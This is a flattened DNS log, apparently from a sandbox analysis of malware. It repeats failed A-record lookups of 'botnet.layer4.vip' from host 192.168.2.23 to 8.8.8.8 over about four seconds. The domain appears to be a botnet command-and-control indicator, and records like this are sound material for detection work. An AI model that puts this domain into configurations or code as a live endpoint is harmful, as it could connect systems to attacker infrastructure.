                                  Apr 9, 2023 03:30:59.218770027 CEST8.8.8.8192.168.2.230x3f8cName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.243072987 CEST8.8.8.8192.168.2.230xa18bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.267693043 CEST8.8.8.8192.168.2.230xa18bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.291882992 CEST8.8.8.8192.168.2.230xa18bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.307737112 CEST8.8.8.8192.168.2.230xa18bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.332297087 CEST8.8.8.8192.168.2.230xa18bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.348061085 CEST8.8.8.8192.168.2.230xb336Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.364161015 CEST8.8.8.8192.168.2.230xb336Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.380105019 CEST8.8.8.8192.168.2.230xb336Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.395838976 CEST8.8.8.8192.168.2.230xb336Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.412002087 CEST8.8.8.8192.168.2.230xb336Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.436877966 CEST8.8.8.8192.168.2.230xa026Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.461035013 CEST8.8.8.8192.168.2.230xa026Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.477056980 CEST8.8.8.8192.168.2.230xa026Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.492777109 CEST8.8.8.8192.168.2.230xa026Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.508743048 CEST8.8.8.8192.168.2.230xa026Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.533386946 CEST8.8.8.8192.168.2.230xb31bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.549019098 CEST8.8.8.8192.168.2.230xb31bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.573326111 CEST8.8.8.8192.168.2.230xb31bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.589499950 CEST8.8.8.8192.168.2.230xb31bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.605144024 CEST8.8.8.8192.168.2.230xb31bName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.629489899 CEST8.8.8.8192.168.2.230x3101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.645205021 CEST8.8.8.8192.168.2.230x3101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.669852018 CEST8.8.8.8192.168.2.230x3101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.685576916 CEST8.8.8.8192.168.2.230x3101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.710201979 CEST8.8.8.8192.168.2.230x3101Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.735750914 CEST8.8.8.8192.168.2.230x6fb7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.760206938 CEST8.8.8.8192.168.2.230x6fb7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.784706116 CEST8.8.8.8192.168.2.230x6fb7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.808897018 CEST8.8.8.8192.168.2.230x6fb7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.833583117 CEST8.8.8.8192.168.2.230x6fb7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.849423885 CEST8.8.8.8192.168.2.230x4cfcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.864981890 CEST8.8.8.8192.168.2.230x4cfcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.880791903 CEST8.8.8.8192.168.2.230x4cfcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.904917955 CEST8.8.8.8192.168.2.230x4cfcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.928968906 CEST8.8.8.8192.168.2.230x4cfcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.953586102 CEST8.8.8.8192.168.2.230x72caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.978269100 CEST8.8.8.8192.168.2.230x72caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:30:59.994000912 CEST8.8.8.8192.168.2.230x72caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.010066986 CEST8.8.8.8192.168.2.230x72caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.025721073 CEST8.8.8.8192.168.2.230x72caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.050296068 CEST8.8.8.8192.168.2.230x46caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.066292048 CEST8.8.8.8192.168.2.230x46caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.082210064 CEST8.8.8.8192.168.2.230x46caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.106730938 CEST8.8.8.8192.168.2.230x46caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.122467995 CEST8.8.8.8192.168.2.230x46caName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.146675110 CEST8.8.8.8192.168.2.230x547Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.162246943 CEST8.8.8.8192.168.2.230x547Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.177818060 CEST8.8.8.8192.168.2.230x547Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.201971054 CEST8.8.8.8192.168.2.230x547Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.226032972 CEST8.8.8.8192.168.2.230x547Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.250461102 CEST8.8.8.8192.168.2.230xd1adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.266082048 CEST8.8.8.8192.168.2.230xd1adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.282387972 CEST8.8.8.8192.168.2.230xd1adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.306518078 CEST8.8.8.8192.168.2.230xd1adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.322438955 CEST8.8.8.8192.168.2.230xd1adName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.346534014 CEST8.8.8.8192.168.2.230x3c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.371038914 CEST8.8.8.8192.168.2.230x3c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.386821985 CEST8.8.8.8192.168.2.230x3c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.410876036 CEST8.8.8.8192.168.2.230x3c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.426924944 CEST8.8.8.8192.168.2.230x3c58Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.451076031 CEST8.8.8.8192.168.2.230xfcbcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.475178003 CEST8.8.8.8192.168.2.230xfcbcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.499572992 CEST8.8.8.8192.168.2.230xfcbcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.524122953 CEST8.8.8.8192.168.2.230xfcbcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.548461914 CEST8.8.8.8192.168.2.230xfcbcName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.564327002 CEST8.8.8.8192.168.2.230x190fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.588646889 CEST8.8.8.8192.168.2.230x190fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.612987995 CEST8.8.8.8192.168.2.230x190fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.637335062 CEST8.8.8.8192.168.2.230x190fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.661643982 CEST8.8.8.8192.168.2.230x190fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.677558899 CEST8.8.8.8192.168.2.230x3760Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.693073034 CEST8.8.8.8192.168.2.230x3760Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.717092037 CEST8.8.8.8192.168.2.230x3760Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.732764959 CEST8.8.8.8192.168.2.230x3760Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.757241011 CEST8.8.8.8192.168.2.230x3760Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.781390905 CEST8.8.8.8192.168.2.230xaee7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.797400951 CEST8.8.8.8192.168.2.230xaee7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.812881947 CEST8.8.8.8192.168.2.230xaee7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.836886883 CEST8.8.8.8192.168.2.230xaee7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.861202002 CEST8.8.8.8192.168.2.230xaee7Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.877058983 CEST8.8.8.8192.168.2.230xf29eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.892544985 CEST8.8.8.8192.168.2.230xf29eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.916636944 CEST8.8.8.8192.168.2.230xf29eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.932481050 CEST8.8.8.8192.168.2.230xf29eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.956937075 CEST8.8.8.8192.168.2.230xf29eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.972471952 CEST8.8.8.8192.168.2.230x83f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:00.996846914 CEST8.8.8.8192.168.2.230x83f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.021007061 CEST8.8.8.8192.168.2.230x83f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.045449018 CEST8.8.8.8192.168.2.230x83f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.061633110 CEST8.8.8.8192.168.2.230x83f0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.086106062 CEST8.8.8.8192.168.2.230x73a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.102360964 CEST8.8.8.8192.168.2.230x73a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.126548052 CEST8.8.8.8192.168.2.230x73a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.150826931 CEST8.8.8.8192.168.2.230x73a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.166454077 CEST8.8.8.8192.168.2.230x73a9Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.182451963 CEST8.8.8.8192.168.2.230x13e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.198333979 CEST8.8.8.8192.168.2.230x13e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.214137077 CEST8.8.8.8192.168.2.230x13e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.238343954 CEST8.8.8.8192.168.2.230x13e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.253928900 CEST8.8.8.8192.168.2.230x13e1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.278143883 CEST8.8.8.8192.168.2.230x5441Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.302536011 CEST8.8.8.8192.168.2.230x5441Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.326709032 CEST8.8.8.8192.168.2.230x5441Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.342659950 CEST8.8.8.8192.168.2.230x5441Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.366975069 CEST8.8.8.8192.168.2.230x5441Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.382917881 CEST8.8.8.8192.168.2.230x2672Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.407208920 CEST8.8.8.8192.168.2.230x2672Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.431821108 CEST8.8.8.8192.168.2.230x2672Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.456469059 CEST8.8.8.8192.168.2.230x2672Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.481050968 CEST8.8.8.8192.168.2.230x2672Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.506939888 CEST8.8.8.8192.168.2.230xaa47Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.522759914 CEST8.8.8.8192.168.2.230xaa47Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.547250032 CEST8.8.8.8192.168.2.230xaa47Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.571945906 CEST8.8.8.8192.168.2.230xaa47Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.596925974 CEST8.8.8.8192.168.2.230xaa47Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.613027096 CEST8.8.8.8192.168.2.230xacadName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.637691975 CEST8.8.8.8192.168.2.230xacadName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.661998034 CEST8.8.8.8192.168.2.230xacadName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.677932024 CEST8.8.8.8192.168.2.230xacadName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.694204092 CEST8.8.8.8192.168.2.230xacadName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.718637943 CEST8.8.8.8192.168.2.230x640eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.743016005 CEST8.8.8.8192.168.2.230x640eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.759020090 CEST8.8.8.8192.168.2.230x640eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.783571005 CEST8.8.8.8192.168.2.230x640eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.799592018 CEST8.8.8.8192.168.2.230x640eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.824223995 CEST8.8.8.8192.168.2.230x80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.848445892 CEST8.8.8.8192.168.2.230x80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.872988939 CEST8.8.8.8192.168.2.230x80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.888680935 CEST8.8.8.8192.168.2.230x80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.904704094 CEST8.8.8.8192.168.2.230x80Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.929202080 CEST8.8.8.8192.168.2.230x3d0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.945175886 CEST8.8.8.8192.168.2.230x3d0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.969360113 CEST8.8.8.8192.168.2.230x3d0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:01.984942913 CEST8.8.8.8192.168.2.230x3d0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.009308100 CEST8.8.8.8192.168.2.230x3d0fName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.033531904 CEST8.8.8.8192.168.2.230xca3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.058078051 CEST8.8.8.8192.168.2.230xca3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.073928118 CEST8.8.8.8192.168.2.230xca3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.089765072 CEST8.8.8.8192.168.2.230xca3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.105288029 CEST8.8.8.8192.168.2.230xca3eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.129681110 CEST8.8.8.8192.168.2.230x3971Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.154280901 CEST8.8.8.8192.168.2.230x3971Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.178555965 CEST8.8.8.8192.168.2.230x3971Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.194457054 CEST8.8.8.8192.168.2.230x3971Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.219252110 CEST8.8.8.8192.168.2.230x3971Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.235337973 CEST8.8.8.8192.168.2.230xe445Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.259505987 CEST8.8.8.8192.168.2.230xe445Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.283930063 CEST8.8.8.8192.168.2.230xe445Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.302067041 CEST8.8.8.8192.168.2.230xe445Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.326066971 CEST8.8.8.8192.168.2.230xe445Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.342022896 CEST8.8.8.8192.168.2.230x7837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.366442919 CEST8.8.8.8192.168.2.230x7837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.381917953 CEST8.8.8.8192.168.2.230x7837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.405858994 CEST8.8.8.8192.168.2.230x7837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.429883957 CEST8.8.8.8192.168.2.230x7837Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.445444107 CEST8.8.8.8192.168.2.230xf795Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.461316109 CEST8.8.8.8192.168.2.230xf795Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.485411882 CEST8.8.8.8192.168.2.230xf795Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.500865936 CEST8.8.8.8192.168.2.230xf795Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.524979115 CEST8.8.8.8192.168.2.230xf795Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.540860891 CEST8.8.8.8192.168.2.230x5bf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.565005064 CEST8.8.8.8192.168.2.230x5bf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.580645084 CEST8.8.8.8192.168.2.230x5bf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.596590042 CEST8.8.8.8192.168.2.230x5bf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.612164974 CEST8.8.8.8192.168.2.230x5bf0Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.636415005 CEST8.8.8.8192.168.2.230x7c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.661019087 CEST8.8.8.8192.168.2.230x7c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.685698032 CEST8.8.8.8192.168.2.230x7c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.701596022 CEST8.8.8.8192.168.2.230x7c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.723103046 CEST8.8.8.8192.168.2.230x7c5eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.747757912 CEST8.8.8.8192.168.2.230x5fcaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.772278070 CEST8.8.8.8192.168.2.230x5fcaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.796865940 CEST8.8.8.8192.168.2.230x5fcaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.821402073 CEST8.8.8.8192.168.2.230x5fcaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.837471962 CEST8.8.8.8192.168.2.230x5fcaName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.853717089 CEST8.8.8.8192.168.2.230x4bd1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.869837999 CEST8.8.8.8192.168.2.230x4bd1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.885660887 CEST8.8.8.8192.168.2.230x4bd1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.910227060 CEST8.8.8.8192.168.2.230x4bd1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.925981998 CEST8.8.8.8192.168.2.230x4bd1Name error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.950400114 CEST8.8.8.8192.168.2.230x14eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.975044966 CEST8.8.8.8192.168.2.230x14eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:02.999531984 CEST8.8.8.8192.168.2.230x14eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.023896933 CEST8.8.8.8192.168.2.230x14eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
                                  Apr 9, 2023 03:31:03.048552036 CEST8.8.8.8192.168.2.230x14eName error (3)botnet.layer4.vipnonenoneA (IP address)IN (0x0001)false
